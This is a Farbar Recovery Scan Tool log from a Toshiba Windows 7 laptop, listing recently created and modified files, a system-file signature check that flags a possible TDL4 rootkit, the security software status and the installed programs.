2014-10-22 10:55 - 2014-10-22 10:55 - 04991400 _____ (Adobe Systems Inc.) C:\Users\My Computer\Downloads\Shockwave_Installer_Slim (1).exe
2014-10-22 10:54 - 2014-10-22 10:54 - 00124928 _____ () C:\Users\My Computer\Downloads\UP3477WS2.xls
2014-10-22 10:51 - 2014-10-22 10:51 - 04991400 _____ (Adobe Systems Inc.) C:\Users\My Computer\Downloads\Shockwave_Installer_Slim.exe
2014-10-22 10:51 - 2014-10-22 10:51 - 00000000 ____D () C:\windows\SysWOW64\Adobe
2014-10-22 10:49 - 2014-10-22 10:49 - 00335360 _____ () C:\Users\My Computer\Downloads\UP3477WS5.xls
2014-10-22 10:48 - 2014-10-22 10:48 - 00067584 _____ () C:\Users\My Computer\Downloads\UP3477WS6.xls
2014-10-18 15:29 - 2014-10-18 15:29 - 00011206 _____ () C:\Users\My Computer\Documents\cc_20141018_162905.reg
2014-10-15 06:15 - 2014-10-09 21:05 - 00507392 _____ (Microsoft Corporation) C:\windows\system32\aepdu.dll
2014-10-15 06:15 - 2014-10-09 21:05 - 00276480 _____ (Microsoft Corporation) C:\windows\system32\generaltel.dll
2014-10-15 06:15 - 2014-10-09 21:00 - 00424448 _____ (Microsoft Corporation) C:\windows\system32\aeinv.dll
2014-10-15 06:15 - 2014-10-06 21:54 - 00378552 _____ (Microsoft Corporation) C:\windows\system32\iedkcs32.dll
2014-10-15 06:15 - 2014-10-06 21:04 - 00331448 _____ (Microsoft Corporation) C:\windows\SysWOW64\iedkcs32.dll
2014-10-15 06:15 - 2014-09-25 17:50 - 13619200 _____ (Microsoft Corporation) C:\windows\system32\ieframe.dll
2014-10-15 06:15 - 2014-09-25 17:46 - 00365056 _____ (Microsoft Corporation) C:\windows\SysWOW64\dxtmsft.dll
2014-10-15 06:15 - 2014-09-25 17:46 - 00243200 _____ (Microsoft Corporation) C:\windows\SysWOW64\dxtrans.dll
2014-10-15 06:15 - 2014-09-25 17:46 - 00069632 _____ (Microsoft Corporation) C:\windows\SysWOW64\mshtmled.dll
2014-10-15 06:15 - 2014-09-25 17:43 - 11807232 _____ (Microsoft Corporation) C:\windows\SysWOW64\ieframe.dll
2014-10-15 06:15 - 2014-09-25 17:32 - 02017280 _____ (Microsoft Corporation) C:\windows\SysWOW64\inetcpl.cpl
2014-10-15 06:15 - 2014-09-25 17:31 - 02108416 _____ (Microsoft Corporation) C:\windows\system32\inetcpl.cpl
2014-10-15 06:15 - 2014-09-18 21:25 - 23631360 _____ (Microsoft Corporation) C:\windows\system32\mshtml.dll
2014-10-15 06:15 - 2014-09-18 20:56 - 02724864 _____ (Microsoft Corporation) C:\windows\system32\mshtml.tlb
2014-10-15 06:15 - 2014-09-18 20:55 - 00004096 _____ (Microsoft Corporation) C:\windows\system32\ieetwcollectorres.dll
2014-10-15 06:15 - 2014-09-18 20:44 - 17484800 _____ (Microsoft Corporation) C:\windows\SysWOW64\mshtml.dll
2014-10-15 06:15 - 2014-09-18 20:41 - 02796032 _____ (Microsoft Corporation) C:\windows\system32\iertutil.dll
2014-10-15 06:15 - 2014-09-18 20:40 - 00547328 _____ (Microsoft Corporation) C:\windows\system32\vbscript.dll
2014-10-15 06:15 - 2014-09-18 20:40 - 00066048 _____ (Microsoft Corporation) C:\windows\system32\iesetup.dll
2014-10-15 06:15 - 2014-09-18 20:39 - 00048640 _____ (Microsoft Corporation) C:\windows\system32\ieetwproxystub.dll
2014-10-15 06:15 - 2014-09-18 20:38 - 00083968 _____ (Microsoft Corporation) C:\windows\system32\MshtmlDac.dll
2014-10-15 06:15 - 2014-09-18 20:36 - 05829632 _____ (Microsoft Corporation) C:\windows\system32\jscript9.dll
2014-10-15 06:15 - 2014-09-18 20:31 - 00051200 _____ (Microsoft Corporation) C:\windows\system32\jsproxy.dll
2014-10-15 06:15 - 2014-09-18 20:30 - 00033792 _____ (Microsoft Corporation) C:\windows\system32\iernonce.dll
2014-10-15 06:15 - 2014-09-18 20:27 - 00595968 _____ (Microsoft Corporation) C:\windows\system32\ieui.dll
2014-10-15 06:15 - 2014-09-18 20:26 - 00139264 _____ (Microsoft Corporation) C:\windows\system32\ieUnatt.exe
2014-10-15 06:15 - 2014-09-18 20:25 - 04201472 _____ (Microsoft Corporation) C:\windows\SysWOW64\jscript9.dll
2014-10-15 06:15 - 2014-09-18 20:25 - 00758272 _____ (Microsoft Corporation) C:\windows\system32\jscript9diag.dll
2014-10-15 06:15 - 2014-09-18 20:25 - 00111616 _____ (Microsoft Corporation) C:\windows\system32\ieetwcollector.exe
2014-10-15 06:15 - 2014-09-18 20:18 - 00940032 _____ (Microsoft Corporation) C:\windows\system32\MsSpellCheckingFacility.exe
2014-10-15 06:15 - 2014-09-18 20:14 - 02724864 _____ (Microsoft Corporation) C:\windows\SysWOW64\mshtml.tlb
2014-10-15 06:15 - 2014-09-18 20:14 - 00446464 _____ (Microsoft Corporation) C:\windows\system32\dxtmsft.dll
2014-10-15 06:15 - 2014-09-18 20:06 - 00072704 _____ (Microsoft Corporation) C:\windows\system32\JavaScriptCollectionAgent.dll
2014-10-15 06:15 - 2014-09-18 20:02 - 00454656 _____ (Microsoft Corporation) C:\windows\SysWOW64\vbscript.dll
2014-10-15 06:15 - 2014-09-18 20:01 - 00195584 _____ (Microsoft Corporation) C:\windows\system32\msrating.dll
2014-10-15 06:15 - 2014-09-18 20:01 - 00061952 _____ (Microsoft Corporation) C:\windows\SysWOW64\iesetup.dll
2014-10-15 06:15 - 2014-09-18 20:01 - 00051200 _____ (Microsoft Corporation) C:\windows\SysWOW64\ieetwproxystub.dll
2014-10-15 06:15 - 2014-09-18 20:00 - 00085504 _____ (Microsoft Corporation) C:\windows\system32\mshtmled.dll
2014-10-15 06:15 - 2014-09-18 19:59 - 00061952 _____ (Microsoft Corporation) C:\windows\SysWOW64\MshtmlDac.dll
2014-10-15 06:15 - 2014-09-18 19:58 - 00289280 _____ (Microsoft Corporation) C:\windows\system32\dxtrans.dll
2014-10-15 06:15 - 2014-09-18 19:55 - 02187264 _____ (Microsoft Corporation) C:\windows\SysWOW64\iertutil.dll
2014-10-15 06:15 - 2014-09-18 19:54 - 00043008 _____ (Microsoft Corporation) C:\windows\SysWOW64\jsproxy.dll
2014-10-15 06:15 - 2014-09-18 19:53 - 00032768 _____ (Microsoft Corporation) C:\windows\SysWOW64\iernonce.dll
2014-10-15 06:15 - 2014-09-18 19:51 - 00440320 _____ (Microsoft Corporation) C:\windows\SysWOW64\ieui.dll
2014-10-15 06:15 - 2014-09-18 19:50 - 00112128 _____ (Microsoft Corporation) C:\windows\SysWOW64\ieUnatt.exe
2014-10-15 06:15 - 2014-09-18 19:49 - 00597504 _____ (Microsoft Corporation) C:\windows\SysWOW64\jscript9diag.dll
2014-10-15 06:15 - 2014-09-18 19:42 - 00731136 _____ (Microsoft Corporation) C:\windows\system32\msfeeds.dll
2014-10-15 06:15 - 2014-09-18 19:42 - 00710656 _____ (Microsoft Corporation) C:\windows\system32\ie4uinit.exe
2014-10-15 06:15 - 2014-09-18 19:40 - 01249280 _____ (Microsoft Corporation) C:\windows\system32\mshtmlmedia.dll
2014-10-15 06:15 - 2014-09-18 19:36 - 00060416 _____ (Microsoft Corporation) C:\windows\SysWOW64\JavaScriptCollectionAgent.dll
2014-10-15 06:15 - 2014-09-18 19:33 - 02309632 _____ (Microsoft Corporation) C:\windows\system32\wininet.dll
2014-10-15 06:15 - 2014-09-18 19:32 - 00164864 _____ (Microsoft Corporation) C:\windows\SysWOW64\msrating.dll
2014-10-15 06:15 - 2014-09-18 19:20 - 00607744 _____ (Microsoft Corporation) C:\windows\SysWOW64\msfeeds.dll
2014-10-15 06:15 - 2014-09-18 19:18 - 01068032 _____ (Microsoft Corporation) C:\windows\SysWOW64\mshtmlmedia.dll
2014-10-15 06:15 - 2014-09-18 19:14 - 01447936 _____ (Microsoft Corporation) C:\windows\system32\urlmon.dll
2014-10-15 06:15 - 2014-09-18 18:59 - 01810944 _____ (Microsoft Corporation) C:\windows\SysWOW64\wininet.dll
2014-10-15 06:15 - 2014-09-18 18:59 - 00775168 _____ (Microsoft Corporation) C:\windows\system32\ieapfltr.dll
2014-10-15 06:15 - 2014-09-18 18:53 - 01190400 _____ (Microsoft Corporation) C:\windows\SysWOW64\urlmon.dll
2014-10-15 06:15 - 2014-09-18 18:52 - 00678400 _____ (Microsoft Corporation) C:\windows\SysWOW64\ieapfltr.dll
2014-10-15 06:14 - 2014-09-28 19:58 - 03198976 _____ (Microsoft Corporation) C:\windows\system32\win32k.sys
2014-10-15 06:13 - 2014-07-08 21:03 - 00007168 _____ (Microsoft Corporation) C:\windows\system32\KBDYAK.DLL
2014-10-15 06:13 - 2014-07-08 21:03 - 00007168 _____ (Microsoft Corporation) C:\windows\system32\KBDTAT.DLL
2014-10-15 06:13 - 2014-07-08 21:03 - 00007168 _____ (Microsoft Corporation) C:\windows\system32\KBDRU1.DLL
2014-10-15 06:13 - 2014-07-08 21:03 - 00007168 _____ (Microsoft Corporation) C:\windows\system32\KBDBASH.DLL
2014-10-15 06:13 - 2014-07-08 21:03 - 00006656 _____ (Microsoft Corporation) C:\windows\system32\KBDRU.DLL
2014-10-15 06:13 - 2014-07-08 20:31 - 00007168 _____ (Microsoft Corporation) C:\windows\SysWOW64\KBDYAK.DLL
2014-10-15 06:13 - 2014-07-08 20:31 - 00007168 _____ (Microsoft Corporation) C:\windows\SysWOW64\KBDTAT.DLL
2014-10-15 06:13 - 2014-07-08 20:31 - 00006656 _____ (Microsoft Corporation) C:\windows\SysWOW64\KBDRU1.DLL
2014-10-15 06:13 - 2014-07-08 20:31 - 00006656 _____ (Microsoft Corporation) C:\windows\SysWOW64\KBDRU.DLL
2014-10-15 06:13 - 2014-07-08 20:31 - 00006656 _____ (Microsoft Corporation) C:\windows\SysWOW64\KBDBASH.DLL
2014-10-15 06:13 - 2014-07-08 17:38 - 00419992 _____ () C:\windows\system32\locale.nls
2014-10-15 06:13 - 2014-07-08 17:30 - 00419992 _____ () C:\windows\SysWOW64\locale.nls
2014-10-15 06:13 - 2014-06-18 17:23 - 01943696 _____ (Microsoft Corporation) C:\windows\system32\dfshim.dll
2014-10-15 06:13 - 2014-06-18 17:23 - 01131664 _____ (Microsoft Corporation) C:\windows\SysWOW64\dfshim.dll
2014-10-15 06:13 - 2014-06-18 17:23 - 00156824 _____ (Microsoft Corporation) C:\windows\SysWOW64\mscorier.dll
2014-10-15 06:13 - 2014-06-18 17:23 - 00156312 _____ (Microsoft Corporation) C:\windows\system32\mscorier.dll
2014-10-15 06:13 - 2014-06-18 17:23 - 00081560 _____ (Microsoft Corporation) C:\windows\SysWOW64\mscories.dll
2014-10-15 06:13 - 2014-06-18 17:23 - 00073880 _____ (Microsoft Corporation) C:\windows\system32\mscories.dll
2014-10-15 06:04 - 2014-09-17 21:00 - 03241472 _____ (Microsoft Corporation) C:\windows\system32\msi.dll
2014-10-15 06:04 - 2014-09-17 20:32 - 02363904 _____ (Microsoft Corporation) C:\windows\SysWOW64\msi.dll
2014-10-15 06:04 - 2014-09-12 20:58 - 00077312 _____ (Microsoft Corporation) C:\windows\system32\packager.dll
2014-10-15 06:04 - 2014-09-12 20:40 - 00067072 _____ (Microsoft Corporation) C:\windows\SysWOW64\packager.dll
2014-10-15 06:04 - 2014-09-04 00:23 - 00424448 _____ (Microsoft Corporation) C:\windows\system32\rastls.dll
2014-10-15 06:04 - 2014-09-04 00:04 - 00372736 _____ (Microsoft Corporation) C:\windows\SysWOW64\rastls.dll
2014-10-15 06:04 - 2014-07-16 21:07 - 03722240 _____ (Microsoft Corporation) C:\windows\system32\mstscax.dll
2014-10-15 06:04 - 2014-07-16 21:07 - 01118720 _____ (Microsoft Corporation) C:\windows\system32\mstsc.exe
2014-10-15 06:04 - 2014-07-16 21:07 - 00681984 _____ (Microsoft Corporation) C:\windows\system32\termsrv.dll
2014-10-15 06:04 - 2014-07-16 21:07 - 00455168 _____ (Microsoft Corporation) C:\windows\system32\winlogon.exe
2014-10-15 06:04 - 2014-07-16 21:07 - 00235520 _____ (Microsoft Corporation) C:\windows\system32\winsta.dll
2014-10-15 06:04 - 2014-07-16 21:07 - 00150528 _____ (Microsoft Corporation) C:\windows\system32\rdpcorekmts.dll
2014-10-15 06:04 - 2014-07-16 21:07 - 00086528 _____ (Microsoft Corporation) C:\windows\system32\TSpkg.dll
2014-10-15 06:04 - 2014-07-16 21:07 - 00022016 _____ (Microsoft Corporation) C:\windows\system32\credssp.dll
2014-10-15 06:04 - 2014-07-16 20:40 - 00157696 _____ (Microsoft Corporation) C:\windows\SysWOW64\winsta.dll
2014-10-15 06:04 - 2014-07-16 20:39 - 03221504 _____ (Microsoft Corporation) C:\windows\SysWOW64\mstscax.dll
2014-10-15 06:04 - 2014-07-16 20:39 - 01051136 _____ (Microsoft Corporation) C:\windows\SysWOW64\mstsc.exe
2014-10-15 06:04 - 2014-07-16 20:39 - 00131584 _____ (Microsoft Corporation) C:\windows\SysWOW64\aaclient.dll
2014-10-15 06:04 - 2014-07-16 20:39 - 00065536 _____ (Microsoft Corporation) C:\windows\SysWOW64\TSpkg.dll
2014-10-15 06:04 - 2014-07-16 20:39 - 00017408 _____ (Microsoft Corporation) C:\windows\SysWOW64\credssp.dll
2014-10-15 06:04 - 2014-07-16 20:21 - 00212480 _____ (Microsoft Corporation) C:\windows\system32\Drivers\rdpwd.sys
2014-10-15 06:04 - 2014-07-16 20:21 - 00039936 _____ (Microsoft Corporation) C:\windows\system32\Drivers\tssecsrv.sys
2014-10-14 20:26 - 2014-10-14 20:27 - 00937005 _____ () C:\Users\My Computer\Downloads\Attachments_20141014 (1).zip
2014-10-14 20:24 - 2014-10-14 20:24 - 03465946 _____ () C:\Users\My Computer\Downloads\Attachments_20141014.zip
2014-10-12 07:47 - 2014-10-12 07:48 - 00002441 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Reader XI.lnk
2014-10-12 07:47 - 2014-10-12 07:47 - 00001990 _____ () C:\Users\Public\Desktop\Adobe Reader XI.lnk
2014-10-12 07:47 - 2014-10-12 07:47 - 00000000 ____D () C:\Program Files (x86)\Adobe

==================== One Month Modified Files and Folders =======

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-11-10 18:24 - 2013-09-24 08:33 - 00000898 _____ () C:\windows\Tasks\GoogleUpdateTaskMachineUA.job
2014-11-10 18:06 - 2014-01-23 16:02 - 00000830 _____ () C:\windows\Tasks\Adobe Flash Player Updater.job
2014-11-10 17:55 - 2012-05-17 22:51 - 00000679 _____ () C:\Users\My Computer\Desktop\Settings.ini
2014-11-10 17:49 - 2014-10-10 11:37 - 00000000 ____D () C:\Users\My Computer\Desktop\New folder (2)
2014-11-10 17:15 - 2013-09-24 08:33 - 00000894 _____ () C:\windows\Tasks\GoogleUpdateTaskMachineCore.job
2014-11-10 17:08 - 2009-07-14 00:13 - 00782510 _____ () C:\windows\system32\PerfStringBackup.INI
2014-11-10 17:05 - 2014-01-12 14:04 - 00004182 _____ () C:\windows\System32\Tasks\avast! Emergency Update
2014-11-09 23:15 - 2009-07-13 23:45 - 00024608 ____H () C:\windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-11-09 23:15 - 2009-07-13 23:45 - 00024608 ____H () C:\windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-11-09 23:07 - 2009-07-14 00:08 - 00000006 ____H () C:\windows\Tasks\SA.DAT
2014-11-09 00:05 - 2012-04-04 13:08 - 00000000 ____D () C:\Users\My Computer\AppData\Local\CrashDumps
2014-11-09 00:05 - 2012-03-18 21:01 - 00000000 ____D () C:\windows\Minidump
2014-11-08 23:31 - 2012-04-06 16:59 - 00000000 ____D () C:\ProgramData\Spybot - Search & Destroy
2014-11-08 20:29 - 2012-04-06 17:28 - 00000864 _____ () C:\windows\wininit.ini
2014-11-08 03:47 - 2009-07-13 22:20 - 00000000 ____D () C:\windows\system32\NDF
2014-11-06 20:54 - 2014-06-12 08:25 - 00000000 ____D () C:\Program Files (x86)\Spybot - Search & Destroy 2
2014-10-27 15:29 - 2014-06-12 08:16 - 00002154 _____ () C:\Users\Public\Desktop\Google Chrome.lnk
2014-10-24 18:28 - 2009-07-13 22:20 - 00000000 ____D () C:\windows\rescache
2014-10-23 11:19 - 2013-09-24 08:33 - 00003894 _____ () C:\windows\System32\Tasks\GoogleUpdateTaskMachineUA
2014-10-23 11:19 - 2013-09-24 08:33 - 00003642 _____ () C:\windows\System32\Tasks\GoogleUpdateTaskMachineCore
2014-10-22 11:06 - 2011-11-02 07:01 - 00000000 ____D () C:\windows\SysWOW64\Macromed
2014-10-21 08:53 - 2012-05-02 18:59 - 01397728 _____ (Tweaking.com) C:\Users\My Computer\Desktop\TweakingRegistryBackup.exe
2014-10-18 11:03 - 2014-05-05 20:02 - 00000000 ___SD () C:\windows\system32\CompatTel
2014-10-18 10:41 - 2012-02-20 16:40 - 00000000 ____D () C:\ProgramData\Microsoft Help
2014-10-18 10:34 - 2013-07-12 07:00 - 00000000 ____D () C:\windows\system32\MRT
2014-10-18 04:18 - 2012-03-04 22:01 - 103265616 _____ (Microsoft Corporation) C:\windows\system32\MRT.exe
2014-10-17 18:14 - 2012-07-17 14:34 - 00003984 _____ () C:\windows\System32\Tasks\PC Checkup 3 Weekly Scan
2014-10-12 07:47 - 2011-11-02 07:01 - 00000000 ____D () C:\ProgramData\Adobe

==================== Bamital & volsnap Check =================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\System32\winlogon.exe => File is digitally signed
C:\Windows\System32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\System32\services.exe => File is digitally signed
C:\Windows\System32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\System32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed
C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed

TDL4: custom:26000022 <===== ATTENTION!


LastRegBack: 2014-10-27 07:21




Additional scan result of Farbar Recovery Scan Tool (x64) Version: 10-11-2014
Ran by My Computer at 2014-11-10 18:34:03
Running from C:\Users\My Computer\Desktop
Boot Mode: Normal
==========================================================


==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: avast! Antivirus (Enabled - Up to date) {17AD7D40-BA12-9C46-7131-94903A54AD8B}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Spybot - Search and Destroy (Enabled - Up to date) {9BC38DF1-3CCA-732D-A930-C1CA5F20A4B0}
AS: avast! Antivirus (Enabled - Up to date) {ACCC9CA4-9C28-93C8-4B81-AFE241D3E736}
FW: avast! Antivirus (Disabled) {2F96FC65-F07D-9D1E-5A6E-3DA5C487EAF0}

==================== Installed Programs ======================

(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

Adobe Flash Player 15 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 15.0.0.167 - Adobe Systems Incorporated)
Adobe Reader XI (11.0.09) (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AB0000000001}) (Version: 11.0.09 - Adobe Systems Incorporated)
Adobe Shockwave Player 12.1 (HKLM-x32\...\Adobe Shockwave Player) (Version: 12.1.3.153 - Adobe Systems, Inc.)
AMD Catalyst Install Manager (HKLM\...\{00A1FDC6-461F-FC6C-8311-B72F9708B2A9}) (Version: 3.0.851.0 - Advanced Micro Devices, Inc.)
avast! Ad Blocker (HKLM-x32\...\{021C6667-63D3-4416-B537-865E77F4DF4F}) (Version: 1.0.0.0 - AVAST Software)
avast! Free Antivirus (HKLM-x32\...\Avast) (Version: 9.0.2021 - AVAST Software)
Big Fish Games: Game Manager (HKLM-x32\...\BFGC) (Version: 3.0.1.60 - )
Bing Bar (HKLM-x32\...\{FF6DD716-7B10-4269-9F19-FFB07AC4CD95}) (Version: 7.3.124.0 - Microsoft Corporation)
Bing Rewards Client Installer (x32 Version: 16.0.345.0 - Microsoft Corporation) Hidden
CCleaner (HKLM\...\CCleaner) (Version: 4.17 - Piriform)
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
GameCenter 1.3.0.6 (HKLM-x32\...\GameCenter_is1) (Version: 1.3.0.6 - Cyanide)
GeoGebra (HKLM-x32\...\GeoGebra) (Version: 4.0.40.0 - International GeoGebra Institute)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 38.0.2125.111 - Google Inc.)
Google Toolbar for Internet Explorer (HKLM-x32\...\{2318C2B1-4965-11d4-9B18-009027A5CD4F}) (Version: 7.5.5111.1712 - Google Inc.)
Google Toolbar for Internet Explorer (x32 Version: 1.0.0 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.25.5 - Google Inc.) Hidden
HP Deskjet 1050 J410 series Basic Device Software (HKLM\...\{4268BF51-DFDF-4178-8B8D-5D5752FCAA58}) (Version: 22.50.231.0 - Hewlett-Packard Co.)
HP Deskjet 1050 J410 series Help (HKLM-x32\...\{5C90D8CF-F12A-41C6-9007-3B651A1F0D78}) (Version: 140.0.66.66 - Hewlett Packard)
HP Deskjet 1050 J410 series Product Improvement Study (HKLM\...\{1AB4DB8C-4123-45DC-B896-C67990F76DA4}) (Version: 22.50.231.0 - Hewlett-Packard Co.)
HP Deskjet 2540 series Basic Device Software (HKLM\...\{7AF1A318-2914-41CC-9B24-041C2D4AAAD7}) (Version: 32.0.1180.44630 - Hewlett-Packard Co.)
HP Deskjet 2540 series Help (HKLM-x32\...\{4539575D-C09D-4E71-B207-0F2D6BD74DA2}) (Version: 30.0.0 - Hewlett Packard)
HP Photo Creations (HKLM-x32\...\HP Photo Creations) (Version: 1.0.0.3781 - HP Photo Creations Powered by RocketLife)
HP Update (HKLM-x32\...\{912D30CF-F39E-4B31-AD9A-123C6B794EE2}) (Version: 5.005.002.002 - Hewlett-Packard)
Java 7 Update 65 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F03217065FF}) (Version: 7.0.650 - Oracle)
Junk Mail filter update (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Label@Once 1.0 (HKLM-x32\...\{0D795777-9D60-4692-8386-F2B3F2B5E5BF}) (Version: 1.0 - Corel)
Mesh Runtime (x32 Version: 15.4.5722.2 - Microsoft Corporation) Hidden
Microsoft .NET Framework 4.5.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50938 - Microsoft Corporation)
Microsoft Office 2007 Service Pack 3 (SP3) (HKLM-x32\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{6E107EB7-8B55-48BF-ACCB-199F86A2CD93}) (Version: - Microsoft)
Microsoft Office File Validation Add-In (HKLM-x32\...\{90140000-2005-0000-0000-0000000FF1CE}) (Version: 14.0.5130.5003 - Microsoft Corporation)
Microsoft Office Home and Student 2007 (HKLM-x32\...\HOMESTUDENTR) (Version: 12.0.6612.1000 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Mystery Case Files&reg;: Shadow Lake (HKLM-x32\...\BFG-Mystery Case Files - Shadow Lake) (Version: - )
Nitro Reader 3 (HKLM\...\{F6478CC2-B1B3-497E-9BEA-94C1676637DF}) (Version: 3.5.5.2 - Nitro)
Norton PC Checkup (HKLM-x32\...\Norton PC Checkup_is1) (Version: 3.0.2.90.0 - NortonLive Services)
PlayReady PC Runtime amd64 (HKLM\...\{BCA9334F-B6C9-4F65-9A73-AC5A329A4D04}) (Version: 1.3.0 - Microsoft Corporation)
PlayReady PC Runtime x86 (HKLM-x32\...\{CCA5EAAD-92F4-4B7A-B5EE-14294C66AB61}) (Version: 1.3.0 - Microsoft Corporation)
Pro Cycling Manager - Season 2010 version 1.0.2.2 (HKLM-x32\...\Pro Cycling Manager 2010_is1) (Version: 1.0.2.2 - Cyanide)
Product Improvement Study for HP Deskjet 2540 series (HKLM\...\{446CCB22-B632-4A1D-BF84-DA8DB0575F98}) (Version: 32.0.1180.44630 - Hewlett-Packard Co.)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 7.38.113.2011 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6410 - Realtek Semiconductor Corp.)
Realtek USB 2.0 Card Reader (HKLM-x32\...\{96AE7E41-E34E-47D0-AC07-1091A8127911}) (Version: 6.1.7600.30126 - Realtek Semiconductor Corp.)
Realtek WLAN Driver (HKLM-x32\...\{9D3D8C60-A55F-4fed-B2B9-173001290E16}) (Version: 2.00.0016 - REALTEK Semiconductor Corp.)
Skype Launcher (HKLM-x32\...\{DA84ECBF-4B79-47F2-B34C-95C38484C058}) (Version: 2.01 - TOSHIBA Corporation)
Spybot - Search & Destroy (HKLM-x32\...\{B4092C6D-E886-4CB2-BA68-FE5A99D31DE7}_is1) (Version: 2.4.40 - Safer-Networking Ltd.)
swMSM (x32 Version: 12.0.0.1 - Adobe Systems, Inc) Hidden
Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 15.2.11.1 - Synaptics Incorporated)
Toshiba App Place (HKLM-x32\...\{ED3CBA78-488F-4E8C-B33F-8E3BF4DDB4D2}) (Version: 1.0.6.3 - Toshiba)
TOSHIBA Application Installer (HKLM-x32\...\{970472D0-F5F9-4158-A6E3-1AE49EFEF2D3}) (Version: 9.0.1.2 - TOSHIBA)
TOSHIBA Assist (HKLM-x32\...\{C2A276E3-154E-44DC-AAF1-FFDD7FD30E35}) (Version: 4.2.3.0 - TOSHIBA CORPORATION)
Toshiba Book Place (HKLM-x32\...\{A14962A7-2B7D-456E-BFCD-F54E3A88D41F}) (Version: 2.2.7530 - K-NFB Reading Technology, Inc.)
TOSHIBA Disc Creator (HKLM\...\{5DA0E02F-970B-424B-BF41-513A5018E4C0}) (Version: 2.1.0.11 for x64 - TOSHIBA Corporation)
TOSHIBA eco Utility (HKLM\...\{C2F94B5E-201A-4754-8F2F-4395E1D90DA3}) (Version: 1.3.5.64 - TOSHIBA Corporation)
TOSHIBA Face Recognition (HKLM-x32\...\InstallShield_{F67FA545-D8E5-4209-86B1-AEE045D1003F}) (Version: 3.1.17.64 - TOSHIBA Corporation)
TOSHIBA Hardware Setup (HKLM-x32\...\{2FD5D2C5-A7A1-4065-89BA-90542BF7CCD3}) (Version: 2.00.0014 - TOSHIBA)
TOSHIBA HDD/SSD Alert (HKLM\...\{D4322448-B6AF-4316-B859-D8A0E84DCB38}) (Version: 3.1.64.9 - TOSHIBA Corporation)
Toshiba Laptop Checkup (HKLM-x32\...\NortonPCCheckup) (Version: 2.0.13.11 - Symantec Corporation)
TOSHIBA Media Controller (HKLM-x32\...\{C7A4F26F-F9B0-41B2-8659-99181108CDE3}) (Version: 1.0.87.4 - TOSHIBA CORPORATION)
TOSHIBA Media Controller Plug-in (HKLM-x32\...\{F26FDF57-483E-42C8-A9C9-EEE1EDB256E0}) (Version: 1.0.8.0 - TOSHIBA CORPORATION)
Toshiba Online Backup (HKLM-x32\...\{C57BCDE1-7CB9-467D-B3BA-7E119916CDC1}) (Version: 2.0.0.31 - Toshiba)
TOSHIBA PC Health Monitor (HKLM\...\{9DECD0F9-D3E8-48B0-A390-1CF09F54E3A4}) (Version: 1.7.9.64 - TOSHIBA Corporation)
